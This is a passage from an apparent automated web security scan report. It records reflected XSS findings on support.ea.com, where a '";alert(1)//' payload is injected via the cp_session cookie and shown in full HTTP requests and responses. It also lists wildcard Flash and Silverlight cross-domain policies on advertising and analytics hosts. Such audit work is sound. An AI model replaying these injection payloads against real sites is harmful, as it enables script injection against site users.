Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/answers/detail/a_id/3628 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2131232"%3balert(1)//5a7be544b54; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/3628%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:07 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUDsqYmgYJMhp1hD9nKO0sNeg8BKvlvpEO1Hlt4IFQnl0_Kqb6yTJB2T5Y3FFKMuDpSqD98pb05irCIMWMKOzRXqv3CvKgSsRqfJw2i1PR2UK4CN7%7ExoU5tQ26gWCPzVZ9IBv7E%7Ec8QPwqsjCIEy04gYBBauqjL62FdPznk0JzYuZVxDt2QCbX5FY%7EPN%7E_p7JSPyqa8HHU5xA%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:07 GMT
RNT-Time: D=228615 t=1308923347946099
RNT-Machine: 19
Vary: Accept-Encoding
Content-Length: 74319
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!31232";alert(1)//5a7be544b54";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/4394

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dda"%3balert(1)//5e371188cf5 was submitted in the cp_session cookie. This input was echoed as 65dda";alert(1)//5e371188cf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/answers/detail/a_id/4394 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2165dda"%3balert(1)//5e371188cf5; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/4394%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:10 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU43fR4BA0ZZHLei9yTMdQgMwlKsgEIfAz%7EHxOHekrQ2b6%7EJihCKHi0iV32rZ%7E9e8ugrsLn1xUe8AtsjYMTvSo2aJTQ9pjjZJOx7FxT48zcSBv6I5ZC_GV9veZsIKxwUtB11gkquTHXSu_ZXHHscdGsIA0c03Y9RnG4ogkmvfpY3MC0fdTbw0toXcQihKh90VBov8jksOXsEQ%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:09 GMT
RNT-Time: D=264065 t=1308923350670541
RNT-Machine: 12
Vary: Accept-Encoding
Content-Length: 83870
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!65dda";alert(1)//5e371188cf5";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:59 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://d.adroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:20:42 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 09 Jun 2011 00:14:49 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.4. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "464005-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 23 Jun 2011 20:45:52 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 60179
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.6. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.7. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:14:00 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.9. http://rcci.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www430
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.10. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:32 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.11. http://swsoft.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www265
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.12. http://wotifcom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www609
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.13. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 23 Jun 2011 15:24:40 GMT
Expires: Fri, 24 Jun 2011 15:24:40 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 78835
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.14. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.195
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.15. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.55.26.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
